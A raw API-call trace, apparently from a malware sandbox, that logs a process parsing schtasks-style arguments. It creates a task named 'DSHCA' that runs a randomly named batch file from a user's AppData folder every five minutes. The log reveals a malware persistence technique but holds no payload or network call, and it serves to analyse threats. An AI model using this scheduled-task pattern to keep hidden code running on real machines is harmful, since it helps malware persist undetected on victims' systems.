lstrlenW (lpString="|tn|") returned 4 [0287.791] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0287.791] RtlRestoreLastWin32Error () returned 0x490 [0287.791] lstrlenW (lpString="showsid") returned 7 [0287.791] lstrlenW (lpString="showsid") returned 7 [0287.791] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] lstrlenW (lpString="tn") returned 2 [0287.791] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.791] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.791] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tn|") returned 4 [0287.791] lstrlenW (lpString="|showsid|") returned 9 [0287.791] lstrlenW (lpString="|tn|") returned 4 [0287.791] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0287.791] RtlRestoreLastWin32Error () returned 0x490 [0287.791] RtlRestoreLastWin32Error () returned 0x490 [0287.791] RtlRestoreLastWin32Error () returned 0x0 [0287.791] lstrlenW (lpString="/tn") returned 3 [0287.792] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] lstrlenW (lpString="/tn") returned 3 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] lstrlenW (lpString="DSHCA") returned 5 [0287.792] lstrlenW (lpString="-/") returned 2 [0287.792] StrChrIW (lpStart="-/", wMatch=0x52b0044) returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] lstrlenW (lpString="DSHCA") returned 5 [0287.792] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] lstrlenW (lpString="DSHCA") returned 5 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x0 [0287.792] lstrlenW (lpString="/tr") returned 3 [0287.792] lstrlenW (lpString="-/") returned 2 [0287.792] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.792] lstrlenW (lpString="?") returned 1 [0287.792] lstrlenW (lpString="?") returned 1 [0287.792] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.792] lstrlenW (lpString="tr") returned 2 [0287.792] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.792] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.792] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.792] lstrlenW (lpString="|?|") returned 3 [0287.792] lstrlenW (lpString="|tr|") returned 4 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] lstrlenW (lpString="create") returned 6 [0287.792] lstrlenW (lpString="create") returned 6 [0287.792] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.792] lstrlenW (lpString="tr") returned 2 [0287.792] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.792] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.792] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.792] lstrlenW (lpString="|create|") returned 8 [0287.792] lstrlenW (lpString="|tr|") returned 4 [0287.792] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0287.792] RtlRestoreLastWin32Error () returned 0x490 [0287.792] lstrlenW (lpString="delete") returned 6 [0287.792] lstrlenW (lpString="delete") returned 6 [0287.792] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] lstrlenW (lpString="tr") returned 2 [0287.793] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.793] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.793] lstrlenW (lpString="|delete|") returned 8 [0287.793] lstrlenW (lpString="|tr|") returned 4 [0287.793] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0287.793] RtlRestoreLastWin32Error () returned 0x490 [0287.793] lstrlenW (lpString="query") returned 5 [0287.793] lstrlenW (lpString="query") returned 5 [0287.793] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] lstrlenW (lpString="tr") returned 2 [0287.793] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.793] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.793] lstrlenW (lpString="|query|") returned 7 [0287.793] lstrlenW (lpString="|tr|") returned 4 [0287.793] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0287.793] RtlRestoreLastWin32Error () returned 0x490 [0287.793] lstrlenW (lpString="change") returned 6 [0287.793] lstrlenW (lpString="change") returned 6 [0287.793] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] lstrlenW (lpString="tr") returned 2 [0287.793] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.793] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.793] lstrlenW (lpString="|change|") returned 8 [0287.793] lstrlenW (lpString="|tr|") returned 4 [0287.793] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0287.793] RtlRestoreLastWin32Error () returned 0x490 [0287.793] lstrlenW (lpString="run") returned 3 [0287.793] lstrlenW (lpString="run") returned 3 [0287.793] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.793] lstrlenW (lpString="tr") returned 2 [0287.793] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.794] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.794] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.794] lstrlenW (lpString="|run|") returned 5 [0287.794] lstrlenW (lpString="|tr|") returned 4 [0287.794] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] lstrlenW (lpString="end") returned 3 [0287.794] lstrlenW (lpString="end") returned 3 [0287.794] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.794] lstrlenW (lpString="tr") returned 2 [0287.794] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.794] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.794] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.794] lstrlenW (lpString="|end|") returned 5 [0287.794] lstrlenW (lpString="|tr|") returned 4 [0287.794] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] lstrlenW (lpString="showsid") returned 7 [0287.794] lstrlenW (lpString="showsid") returned 7 [0287.794] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.794] lstrlenW (lpString="tr") returned 2 [0287.794] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.794] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.794] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|tr|") returned 4 [0287.794] lstrlenW (lpString="|showsid|") returned 9 [0287.794] lstrlenW (lpString="|tr|") returned 4 [0287.794] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] RtlRestoreLastWin32Error () returned 0x0 [0287.794] lstrlenW (lpString="/tr") returned 3 [0287.794] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] RtlRestoreLastWin32Error () returned 0x0 [0287.794] lstrlenW (lpString="/tr") returned 3 [0287.794] RtlRestoreLastWin32Error () returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x0 [0287.794] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0287.794] lstrlenW (lpString="-/") returned 2 [0287.794] StrChrIW (lpStart="-/", wMatch=0x52b0043) returned 0x0 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] RtlRestoreLastWin32Error () returned 0x490 [0287.794] RtlRestoreLastWin32Error () returned 0x0 [0287.794] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0287.794] StrChrIW (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat", wMatch=0x3a) returned=":\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat" [0287.794] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0287.794] _memicmp (_Buf1=0xde7638, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] _memicmp (_Buf1=0xde76c8, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] RtlRestoreLastWin32Error () returned 0x7a [0287.795] RtlRestoreLastWin32Error () returned 0x0 [0287.795] RtlRestoreLastWin32Error () returned 0x0 [0287.795] lstrlenW (lpString="C") returned 1 [0287.795] RtlRestoreLastWin32Error () returned 0x490 [0287.795] RtlRestoreLastWin32Error () returned 0x0 [0287.795] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0287.795] RtlRestoreLastWin32Error () returned 0x0 [0287.795] RtlRestoreLastWin32Error () returned 0x0 [0287.795] lstrlenW (lpString="/sc") returned 3 [0287.795] lstrlenW (lpString="-/") returned 2 [0287.795] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.795] lstrlenW (lpString="?") returned 1 [0287.795] lstrlenW (lpString="?") returned 1 [0287.795] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] lstrlenW (lpString="sc") returned 2 [0287.795] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.795] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.795] lstrlenW (lpString="|?|") returned 3 [0287.795] lstrlenW (lpString="|sc|") returned 4 [0287.795] RtlRestoreLastWin32Error () returned 0x490 [0287.795] lstrlenW (lpString="create") returned 6 [0287.795] lstrlenW (lpString="create") returned 6 [0287.795] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] lstrlenW (lpString="sc") returned 2 [0287.795] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.795] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.795] lstrlenW (lpString="|create|") returned 8 [0287.795] lstrlenW (lpString="|sc|") returned 4 [0287.795] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0287.795] RtlRestoreLastWin32Error () returned 0x490 [0287.795] lstrlenW (lpString="delete") returned 6 [0287.795] lstrlenW (lpString="delete") returned 6 [0287.795] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] lstrlenW (lpString="sc") returned 2 [0287.795] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.795] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.795] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.795] lstrlenW (lpString="|delete|") returned 8 [0287.796] lstrlenW (lpString="|sc|") returned 4 [0287.796] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0287.796] RtlRestoreLastWin32Error () returned 0x490 [0287.796] lstrlenW (lpString="query") returned 5 [0287.796] lstrlenW (lpString="query") returned 5 [0287.796] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] lstrlenW (lpString="sc") returned 2 [0287.796] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.796] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.796] lstrlenW (lpString="|query|") returned 7 [0287.796] lstrlenW (lpString="|sc|") returned 4 [0287.796] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0287.796] RtlRestoreLastWin32Error () returned 0x490 [0287.796] lstrlenW (lpString="change") returned 6 [0287.796] lstrlenW (lpString="change") returned 6 [0287.796] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] lstrlenW (lpString="sc") returned 2 [0287.796] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.796] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.796] lstrlenW (lpString="|change|") returned 8 [0287.796] lstrlenW (lpString="|sc|") returned 4 [0287.796] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0287.796] RtlRestoreLastWin32Error () returned 0x490 [0287.796] lstrlenW (lpString="run") returned 3 [0287.796] lstrlenW (lpString="run") returned 3 [0287.796] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] lstrlenW (lpString="sc") returned 2 [0287.796] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.796] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.796] lstrlenW (lpString="|run|") returned 5 [0287.796] lstrlenW (lpString="|sc|") returned 4 [0287.796] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0287.796] RtlRestoreLastWin32Error () returned 0x490 [0287.796] lstrlenW (lpString="end") returned 3 [0287.796] lstrlenW (lpString="end") returned 3 [0287.796] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] lstrlenW (lpString="sc") returned 2 [0287.796] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.796] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.796] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.796] lstrlenW (lpString="|end|") returned 5 [0287.796] lstrlenW (lpString="|sc|") returned 4 [0287.796] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0287.796] RtlRestoreLastWin32Error () returned 0x490 [0287.797] lstrlenW (lpString="showsid") returned 7 [0287.797] lstrlenW (lpString="showsid") returned 7 [0287.797] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.797] lstrlenW (lpString="sc") returned 2 [0287.797] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.797] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.797] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|sc|") returned 4 [0287.797] lstrlenW (lpString="|showsid|") returned 9 [0287.797] lstrlenW (lpString="|sc|") returned 4 [0287.797] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="/sc") returned 3 [0287.797] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="/sc") returned 3 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="minute") returned 6 [0287.797] lstrlenW (lpString="-/") returned 2 [0287.797] StrChrIW (lpStart="-/", wMatch=0x52b006d) returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="minute") returned 6 [0287.797] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x490 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="minute") returned 6 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] RtlRestoreLastWin32Error () returned 0x0 [0287.797] lstrlenW (lpString="/mo") returned 3 [0287.797] lstrlenW (lpString="-/") returned 2 [0287.797] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.798] lstrlenW (lpString="?") returned 1 [0287.798] lstrlenW (lpString="?") returned 1 [0287.798] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] lstrlenW (lpString="mo") returned 2 [0287.798] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.798] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.798] lstrlenW (lpString="|?|") returned 3 [0287.798] lstrlenW (lpString="|mo|") returned 4 [0287.798] RtlRestoreLastWin32Error () returned 0x490 [0287.798] lstrlenW (lpString="create") returned 6 [0287.798] lstrlenW (lpString="create") returned 6 [0287.798] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] lstrlenW (lpString="mo") returned 2 [0287.798] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.798] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.798] lstrlenW (lpString="|create|") returned 8 [0287.798] lstrlenW (lpString="|mo|") returned 4 [0287.798] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0287.798] RtlRestoreLastWin32Error () returned 0x490 [0287.798] lstrlenW (lpString="delete") returned 6 [0287.798] lstrlenW (lpString="delete") returned 6 [0287.798] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] lstrlenW (lpString="mo") returned 2 [0287.798] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.798] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.798] lstrlenW (lpString="|delete|") returned 8 [0287.798] lstrlenW (lpString="|mo|") returned 4 [0287.798] StrStrIW (lpFirst="|delete|", lpSrch="|mo|") returned 0x0 [0287.798] RtlRestoreLastWin32Error () returned 0x490 [0287.798] lstrlenW (lpString="query") returned 5 [0287.798] lstrlenW (lpString="query") returned 5 [0287.798] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] lstrlenW (lpString="mo") returned 2 [0287.798] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.798] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.798] lstrlenW (lpString="|query|") returned 7 [0287.798] lstrlenW (lpString="|mo|") returned 4 [0287.798] StrStrIW (lpFirst="|query|", lpSrch="|mo|") returned 0x0 [0287.798] RtlRestoreLastWin32Error () returned 0x490 [0287.798] lstrlenW (lpString="change") returned 6 [0287.798] lstrlenW (lpString="change") returned 6 [0287.798] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.798] lstrlenW (lpString="mo") returned 2 [0287.798] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.799] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.799] lstrlenW (lpString="|change|") returned 8 [0287.799] lstrlenW (lpString="|mo|") returned 4 [0287.799] StrStrIW (lpFirst="|change|", lpSrch="|mo|") returned 0x0 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] lstrlenW (lpString="run") returned 3 [0287.799] lstrlenW (lpString="run") returned 3 [0287.799] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] lstrlenW (lpString="mo") returned 2 [0287.799] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.799] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.799] lstrlenW (lpString="|run|") returned 5 [0287.799] lstrlenW (lpString="|mo|") returned 4 [0287.799] StrStrIW (lpFirst="|run|", lpSrch="|mo|") returned 0x0 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] lstrlenW (lpString="end") returned 3 [0287.799] lstrlenW (lpString="end") returned 3 [0287.799] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] lstrlenW (lpString="mo") returned 2 [0287.799] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.799] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.799] lstrlenW (lpString="|end|") returned 5 [0287.799] lstrlenW (lpString="|mo|") returned 4 [0287.799] StrStrIW (lpFirst="|end|", lpSrch="|mo|") returned 0x0 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] lstrlenW (lpString="showsid") returned 7 [0287.799] lstrlenW (lpString="showsid") returned 7 [0287.799] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] lstrlenW (lpString="mo") returned 2 [0287.799] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.799] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.799] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|mo|") returned 4 [0287.799] lstrlenW (lpString="|showsid|") returned 9 [0287.799] lstrlenW (lpString="|mo|") returned 4 [0287.799] StrStrIW (lpFirst="|showsid|", lpSrch="|mo|") returned 0x0 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] RtlRestoreLastWin32Error () returned 0x0 [0287.799] lstrlenW (lpString="/mo") returned 3 [0287.799] StrChrIW (lpStart="/mo", wMatch=0x3a) returned 0x0 [0287.799] RtlRestoreLastWin32Error () returned 0x490 [0287.799] RtlRestoreLastWin32Error () returned 0x0 [0287.799] lstrlenW (lpString="/mo") returned 3 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] lstrlenW (lpString="5") returned 1 [0287.800] RtlRestoreLastWin32Error () returned 0x490 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] lstrlenW (lpString="5") returned 1 [0287.800] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0287.800] RtlRestoreLastWin32Error () returned 0x490 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] lstrlenW (lpString="5") returned 1 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] RtlRestoreLastWin32Error () returned 0x0 [0287.800] lstrlenW (lpString="/RL") returned 3 [0287.800] lstrlenW (lpString="-/") returned 2 [0287.800] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.800] lstrlenW (lpString="?") returned 1 [0287.800] lstrlenW (lpString="?") returned 1 [0287.800] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] lstrlenW (lpString="RL") returned 2 [0287.800] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] _vsnwprintf (in: _Buffer=0xde9340, 